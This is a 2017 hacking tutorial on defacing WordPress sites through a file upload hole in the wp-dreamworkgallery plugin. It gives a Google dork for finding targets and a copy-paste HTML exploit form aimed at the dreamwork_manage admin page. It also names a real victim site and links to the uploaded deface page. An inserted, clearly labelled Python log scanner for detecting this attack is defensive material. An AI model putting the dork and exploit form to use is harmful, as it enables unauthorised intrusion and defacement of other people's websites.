Defacement via the WordPress dreamwork_manage File Upload Vulnerability

Author : Unknown


Hello friends, how are you? Straight to the tutorial.

Go straight to Google.


DORKs  "inurl:/wp-content/plugins/wp-dreamworkgallery"

Pick one of the websites.

Copy and paste this exploit into Notepad, then save it, e.g. as an .html file:

<form action="http://www.target.com//wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>

Replace www.target.com with the target website. For example, this is my target:

<form action="http://theatredumordant.fr//wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>



It seems a shell cannot be uploaded with this method, so just upload your deface file directly, e.g. an HTML file, then submit.



If the page looks like that, the site is usually vulnerable. Now check the file we just uploaded. See the image. My file is at
/wp-content/uploads/dreamwork/480_uploadfolder/big/x.html

So the full URL is http://theatredumordant.fr/wp-content/uploads/dreamwork/480_uploadfolder/big/x.html
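
For site owners, the request and file path described above leave a recognizable trace in web server access logs. The following is an added example, not part of the original post: it flags POSTs to the dreamwork_manage admin page and non-image files served from the plugin's upload directory. The Combined Log Format, the list of expected image extensions and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Combined Log Format: ip - - [time] "METHOD target HTTP/x" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif"}  # assumption: valid album image types
UPLOAD_PREFIX = "/wp-content/uploads/dreamwork/"

def findings(lines):
    """Return (kind, ip, target) tuples for requests matching the pattern in this post."""
    out = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, _ts, method, target, status = m.groups()
        raw_path, _, raw_query = target.partition("?")
        # Collapse repeated slashes: the form in the post sends "//wp-admin/...".
        path = re.sub(r"/{2,}", "/", raw_path).lower()
        query = parse_qs(raw_query)
        if (method == "POST" and path == "/wp-admin/admin.php"
                and "dreamwork_manage" in query.get("page", [])):
            # Legitimate admins also POST here, so review these by source IP.
            out.append(("upload_endpoint_post", ip, target))
        elif path.startswith(UPLOAD_PREFIX) and status == "200":
            dot = path.rfind(".")
            ext = path[dot:] if dot > path.rfind("/") else ""
            if ext not in IMAGE_EXT:
                out.append(("non_image_served", ip, target))
    return out

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [05/Apr/2017:10:00:01 +0000] "POST //wp-admin/admin.php?page=dreamwork_manage HTTP/1.1" 200 5120',
    '203.0.113.7 - - [05/Apr/2017:10:00:09 +0000] "GET /wp-content/uploads/dreamwork/480_uploadfolder/big/x.html HTTP/1.1" 200 812',
    '198.51.100.4 - - [05/Apr/2017:10:02:00 +0000] "GET /wp-content/uploads/dreamwork/12_uploadfolder/big/photo.jpg HTTP/1.1" 200 40211',
    '198.51.100.4 - - [05/Apr/2017:10:03:00 +0000] "GET /wp-admin/admin.php?page=dreamwork_manage HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for kind, ip, target in findings(SAMPLE):
        print(f"{kind:22} {ip:15} {target}")
```

A non-image file under the dreamwork upload directory is the stronger signal of the two, since the directory is meant to hold album images only.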


DEMO :

http://www.theatredumordant.fr/wp-content/plugins/wp-dreamworkgallery/xml/drm_all.xml


Posted On : Wednesday, 05 April 2017